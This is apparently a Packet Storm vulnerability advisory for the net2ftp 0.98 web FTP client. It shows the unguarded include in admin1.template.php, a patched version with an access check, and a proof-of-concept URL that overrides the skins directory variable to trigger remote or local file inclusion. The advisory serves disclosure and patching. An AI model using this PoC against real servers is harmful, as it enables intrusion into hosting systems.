net2ftp version Stable 0.98 suffers from remote and local file inclusion vulnerabilities.
b090055348374a5ab55d0c844227af2eb10073929561a312b0e8ecd2a0de6035net2ftp is web based ftp client used by many web shared hosting
////////////////////////////////////////////////////////////////////
Vuln is in file skins/mobile/admin1.template.php:
<?php require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php"); ?>
///////////////////////////////////////////////////////////////////
Pathed Version:
<?php
defined("NET2FTP") or die("Direct access to this location is not allowed.");
require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php");
?>
//////////////////////////////////////////////////////////////////
POC:
http://server/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=evilevilevil
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed